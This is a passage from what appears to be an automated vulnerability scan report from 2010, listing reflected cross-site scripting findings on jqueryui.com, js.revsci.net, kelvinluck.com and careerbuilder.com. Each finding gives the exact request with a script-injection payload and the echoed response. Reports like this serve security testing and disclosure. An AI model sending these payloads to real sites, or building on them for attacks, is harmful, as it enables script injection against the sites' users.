GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff7ef9c"><script>alert(1)</script>ed8429324bf&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff7ef9c"><script>alert(1)</script>ed8429324bf&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

2.172. http://jqueryui.com/themeroller/ [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd783"><script>alert(1)</script>5297cb49336 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545cd783"><script>alert(1)</script>5297cb49336&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545cd783"><script>alert(1)</script>5297cb49336&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa
...[SNIP]...

2.173. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e9c"><script>alert(1)</script>97c25945815 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?58e9c"><script>alert(1)</script>97c25945815=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:27:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&58e9c"><script>alert(1)</script>97c25945815=1" type="text/css" media="all" />
...[SNIP]...

2.174. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5b20"><script>alert(1)</script>b5290387e91 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxe5b20"><script>alert(1)</script>b5290387e91&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxe5b20"><script>alert(1)</script>b5290387e91&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.175. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb683"><script>alert(1)</script>eb19ef13760 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxeb683"><script>alert(1)</script>eb19ef13760&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxeb683"><script>alert(1)</script>eb19ef13760&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.176. http://jqueryui.com/themeroller/ [opacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2e1a"><script>alert(1)</script>f81de3072b1 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30b2e1a"><script>alert(1)</script>f81de3072b1&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30b2e1a"><script>alert(1)</script>f81de3072b1&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

2.177. http://jqueryui.com/themeroller/ [opacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d810"><script>alert(1)</script>4269b9b1148 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=304d810"><script>alert(1)</script>4269b9b1148&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=304d810"><script>alert(1)</script>4269b9b1148&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.178. http://jqueryui.com/themeroller/ [thicknessShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13436"><script>alert(1)</script>8ee759e7141 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px13436"><script>alert(1)</script>8ee759e7141&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px13436"><script>alert(1)</script>8ee759e7141&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.179. http://js.revsci.net/gateway/gw.js [bpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the bpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ed51'%3balert(1)//60b188e2c5e was submitted in the bpid parameter. This input was echoed as 4ed51';alert(1)//60b188e2c5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?csid=G07610&bpid=S02784ed51'%3balert(1)//60b188e2c5e HTTP/1.1
Host: js.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 00:21:33 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 16 Nov 2010 00:21:33 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 15 Nov 2010 00:21:33 GMT
Connection: close
Content-Length: 6346

//Vermont-12.4.0-967
var rsi_now= new Date();
var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba=
...[SNIP]...
i>>18))+"%"+_rsiCa(0x80+(i>>12&0x3F))+"%"+_rsiCa(0x80+(i>>6&0x3F))+"%"+_rsiCa(0x80+(i&0x3F));}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].DM_addEncToLoc("bpid",'S02784ed51';alert(1)//60b188e2c5e');else DM_addEncToLoc("bpid",'S02784ed51';alert(1)//60b188e2c5e');
function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChil
...[SNIP]...

2.180. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e12c1<script>alert(1)</script>25550789a86 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07610e12c1<script>alert(1)</script>25550789a86&bpid=S0278 HTTP/1.1
Host: js.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 00:21:33 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 16 Nov 2010 00:21:33 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 15 Nov 2010 00:21:32 GMT
Connection: close
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07610E12C1<SCRIPT>ALERT(1)</SCRIPT>25550789A86" was not recognized.
*/

2.181. http://kelvinluck.com/assets/jquery/jScrollPane/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kelvinluck.com
Path:   /assets/jquery/jScrollPane/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2103e<script>alert(1)</script>7435dca659c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jquery/jScrollPane2103e<script>alert(1)</script>7435dca659c/ HTTP/1.1
Host: kelvinluck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 22:27:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.kelvinluck.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 14 Nov 2010 22:27:44 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Nothing found for
...[SNIP]...
<strong>http://www.kelvinluck.com/assets/jquery/jScrollPane2103e<script>alert(1)</script>7435dca659c/</strong>
...[SNIP]...

2.182. http://kelvinluck.com/assets/jquery/jScrollPane/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kelvinluck.com
Path:   /assets/jquery/jScrollPane/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44196"><script>alert(1)</script>3ac3dc6d2a9 was submitted in the REST URL parameter 3. This input was echoed as 44196\"><script>alert(1)</script>3ac3dc6d2a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jquery/jScrollPane44196"><script>alert(1)</script>3ac3dc6d2a9/ HTTP/1.1
Host: kelvinluck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 22:27:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.kelvinluck.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 14 Nov 2010 22:27:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Nothing found for
...[SNIP]...
<a href="http://2005.kelvinluck.com/assets/jquery/jScrollPane44196\"><script>alert(1)</script>3ac3dc6d2a9/">
...[SNIP]...

2.183. http://manufacturing.careerbuilder.com/mf.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://manufacturing.careerbuilder.com
Path:   /mf.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a78f'-alert(1)-'2c61d5b8e89 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

